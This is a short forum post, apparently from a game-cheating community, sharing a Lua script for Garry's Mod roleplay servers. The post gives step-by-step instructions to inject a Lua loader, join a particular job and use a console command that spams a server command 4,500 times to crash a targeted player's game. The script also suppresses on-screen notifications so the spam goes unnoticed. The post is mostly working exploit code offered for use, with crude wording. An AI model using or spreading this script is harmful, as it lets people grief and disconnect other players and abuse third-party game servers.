This script is not mine. This script has been used wich all SUP servers. This script allows to crash players. You need: 1. Inject lua loader (Methamine injector is not fucking work) 2. Join to server 3. Joint to job whore or a prostitute 4. Inject script wich loader 5. Go to player and use concommand "sex" to crash
Code:
rp.ui = rp.ui or {} function rp.ui.Drawbar() return false end function rp.iu.DrawProgress() return false end notification.AddLegacy = function() return false end notification.AddProgress = function() return false end
concommand.Add('sex',function() if LocalPlayer():GetEyeTrace().Entity:IsPlayer() and LocalPlayer():GetEyeTrace().Entity:IsValid() then for i=1,4500 do rp.RunCommand('sex') end else return end end)
P.s This script work only for the SUP server and only wich job whore or a prostitute. Not SUP servers this script can't bee work